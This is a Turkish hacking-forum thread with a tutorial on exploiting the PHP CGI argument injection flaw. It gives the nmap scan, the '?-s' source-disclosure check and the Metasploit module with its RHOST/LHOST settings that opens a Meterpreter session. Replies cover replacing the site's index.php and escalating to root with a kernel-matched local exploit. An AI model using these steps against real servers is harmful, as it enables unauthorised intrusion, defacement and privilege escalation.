İPUCU

Web & Server Güvenliği Doğru web ve veritabanı sunucusu güvenliği sağlanmadan, bilgisayar korsanları hassas verilerinize erişebilir. Web, Sunucu ve veritabanı güvenliğini nasıl sağlayacağınızı buradan öğrenebilirsiniz.

Seçenekler

PHP CGI Arg İnjection Exploit / Pentester

24-01-2017 14:25
#1
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.169
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
CGI hakkında; http://www.turkhackteam.org/web-serv...cgi-nedir.html

Bu konuda sizlere, "PHP CGI Argument İnjection" güvenlik açığını anlatacağım.

PHP CGI Argument injection açığı sayesinde, "-s" sorgu parametresi ile sitede herhangi bir php dosyası kaynak kodu elde edilebilir.

Bu durumla karşılaşırsanız, PHP CGI Argument İnjection zafiyeti bulunmaktadır.

Söz konusu zafiyeti içinde barındıran sunucunun portlarını tarayalım.

"nmap -sV -p80 192.168.127.130" ile 80.portu spesifik olarak tararız.




Gördüğünüz gibi, 80. port üzerinde apache web sunucusu çalışmaktadır.
Tarayıcımızda, "192.168.127.130/phpMyAdmin/" adresine gittiğimizde phpmyadmin sayfası açılacaktır.

"?-s" sorgusunu eklediğimizde,

"192.168.127.130/phpMyAdmin/?-s" bu şekilde eklediğimzde php kaynak kodları gözükmekte
olduğundan, "Php CGI Argument İnjection" zafiyetinin olduğunu anladık.




Sıra geldi bu açığı métasploit ile exploit etmeye.
"msfconsole" komutu ile métasploit framework’ ümüzü açalım.

"use exploit/multi/http/php_cgi_arg_injection" exploitine giriyoruz.

"show options" ile genel ayarları görüyoruz.

"set RHOST 192.168.127.130" ve set LHOST 192.168.127.129" bilgilerini giriyoruz ve "exploit" komutunu veriyoruz.




Meterpreter oturumu açılmıştır. Artık meterpreter komutları çalıştırabilirsiniz.



"pwd" komutu ile hangi dizinde olduğumu gördüm. "/var/www" çıktısını aldım.
"cd /var/www" komutu ile dizine girdim ve "ls" komutu ile buldunduğum dizini listeledim.
Web adresinin sayfaları karşımda. Artık index.php sayfasını editlemek kendi indexinizi yerleştirmek size kalmış.

Bu konumuz bu kadar. Okuduğunuz için hepinize teşekkür ederim. Bir daha ki konuda görüşmek üzere..
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
Konu Pentester tarafından (24-01-2017 14:40 Saat 14:40 ) değiştirilmiştir.

24-01-2017 14:33
#2
cimbomenes1905 - ait Kullanıcı Resmi (Avatar)
Tamamen Forumdan Uzaklaştırıldı
Üyelik tarihi:
09/2014
Nereden:
127.0.0.1
Mesajlar:
1.861
Teşekkür (Etti):
271
Teşekkür (Aldı):
325
Konular:
78
Ticaret:
(0) %
Eline sağlık kardeşim güzel bir konu daha.
Pentester Teşekkür etti.
24-01-2017 14:35
#3
Kelyback - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
buldun
Mesajlar:
751
Teşekkür (Etti):
75
Teşekkür (Aldı):
73
Konular:
51
Ticaret:
(0) %
Teğmenim harika bir konu olmuş ellerine sağlık
Peki ya armitage kullanarak exploitlemek istersek nasıl yapabiliriz bi bilginiz varmı?

Ve diyelim sunucuda birden fazla site var bu işlemi yapınca direk root yetkisimi alıyoruz yoksa ayrıyeten root exploiti mi atmamız gerek
Kullanıcı İmzası
Yükselirken geçtiğin tüm dalları kırarsan, düşerken tutunacak dal bulamazsın...

Şapka Rengi : GRİ

F
Konu Kelyback tarafından (24-01-2017 14:39 Saat 14:39 ) değiştirilmiştir.
Pentester Teşekkür etti.
24-01-2017 14:38
#4
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.169
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Alıntı:
Kelyback´isimli üyeden Alıntı Mesajı göster
Teğmenim harika bir konu olmuş ellerine sağlık
Peki ya armitage kullanarak exploitlemek istersek nasıl yapabiliriz bi bilginiz varmı
Bildiğiniz gibi armitage; métasploitin grafik arayüz uygulamasıdır. Armitage kullanımını biliyorsanız, aynı işlevi basit bir şekilde uygulayabilirsiniz. Teşekkür ederim.
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
24-01-2017 14:44
#5
Kelyback - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2016
Nereden:
buldun
Mesajlar:
751
Teşekkür (Etti):
75
Teşekkür (Aldı):
73
Konular:
51
Ticaret:
(0) %
Alıntı:
Pentester´isimli üyeden Alıntı Mesajı göster
Bildiğiniz gibi armitage; métasploitin grafik arayüz uygulamasıdır. Armitage kullanımını biliyorsanız, aynı işlevi basit bir şekilde uygulayabilirsiniz. Teşekkür ederim.
Linuxta yeniyim hocam bu arada pentester academy kanalınızda bir sürü web zaafiyeti oldugunu gördüm tamda boyle birseye ihtiyacım vardı videolarinizi izliyicem simdi hocam bişeyler kaparım belki
Kullanıcı İmzası
Yükselirken geçtiğin tüm dalları kırarsan, düşerken tutunacak dal bulamazsın...

Şapka Rengi : GRİ

F
Pentester Teşekkür etti.
24-01-2017 15:00
#6
Pentester - ait Kullanıcı Resmi (Avatar)
Researcher
Üyelik tarihi:
09/2016
Mesajlar:
1.169
Teşekkür (Etti):
613
Teşekkür (Aldı):
483
Konular:
89
Ticaret:
(0) %
Alıntı:
Kelyback´isimli üyeden Alıntı Mesajı göster

Ve diyelim sunucuda birden fazla site var bu işlemi yapınca direk root yetkisimi alıyoruz yoksa ayrıyeten root exploiti mi atmamız gerek
Exploit ettikten sonra, "shell" komutunu verip, shell üzerinde "whoami" komutu ile bulunduğunuz yetkiyi gorebilirsiniz. Eğer root değilseniz, "uname -a" komutunu girip, kernel sürümüne uygun, Local privilege exploit bulup, sisteme çekip, çalıştırabilirsiniz, ardından root olabilirsiniz.
Bu exploitin verdiği yetkiyi hatırlamıyorum şuan, çok önceden Google docs üzerinde muhafaza ediyordum, paylaşmak bugüne kısmet oldu
Kullanıcı İmzası
"Benim naçiz vücudum, bir gün elbet toprak olacaktır. Fakat Türkiye Cumhuriyeti, ilelebet payidar kalacaktır."
Mustafa Kemal ATATÜRK

Yapabildiğimiz her şeyi yapsaydık, buna kendimiz bile şaşardık.
24-01-2017 15:11
#7
Anka1050 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
01/2017
Nereden:
İstanbul
Mesajlar:
118
Teşekkür (Etti):
99
Teşekkür (Aldı):
33
Konular:
19
Ticaret:
(0) %
Elinize sağlık çok faydalı bir konu olmuş eve gidince denemesini yapacağim.
Kullanıcı İmzası
\\ Yaşasın Irkımın Turan Ülküsü //
Pentester Teşekkür etti.
24-01-2017 15:17
#8
Mustafa Akkaya - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
08/2015
Nereden:
Ceres
Mesajlar:
1.481
Teşekkür (Etti):
120
Teşekkür (Aldı):
122
Konular:
31
Ticaret:
(0) %
Yaralı Bir Konu
Pentester Teşekkür etti.

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı